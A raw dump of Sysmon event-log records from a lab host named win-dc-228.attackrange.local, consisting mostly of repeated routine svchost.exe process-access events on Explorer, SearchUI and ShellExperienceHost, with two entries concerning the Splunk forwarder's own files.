14:03:33.849{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=60752384E4E4CD3970ACE82178BC0A4A,SHA256=8A3FFFB97D2B6CC7836980DFAB3572C98CDB1A79AECEDFF9430BFF2B89576C00,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202390Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:34.865{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D2BF335D13F440C2DA2C4CA15B9CE1A8,SHA256=22BFF7404FCA4838E9C89C524D00745C7B150CA7A7C42E6E738ACDB266C8E91D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002202423Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:35.630{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-9A00-603E-9E07-00000000AD01}4168C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202422Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:35.630{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-9A00-603E-9E07-00000000AD01}4168C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202421Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:35.630{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-9A00-603E-9E07-00000000AD01}4168C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202420Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:35.630{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202419Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:35.630{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202418Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:35.630{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202417Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:35.630{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202416Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:35.630{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202415Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:35.630{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202414Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:35.630{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202413Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:35.630{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202412Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:35.630{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202411Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:35.630{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202410Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:35.630{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202409Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:35.630{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202408Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:35.630{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202407Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:35.630{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202406Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:35.630{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202405Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:35.630{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202404Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:35.630{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202403Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:35.630{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202402Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:35.630{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202401Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:35.630{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202400Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:35.630{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202399Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:35.630{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202398Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:35.630{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202397Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:35.630{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202396Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:35.630{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202395Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:35.630{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202394Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:35.630{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202393Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:35.630{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 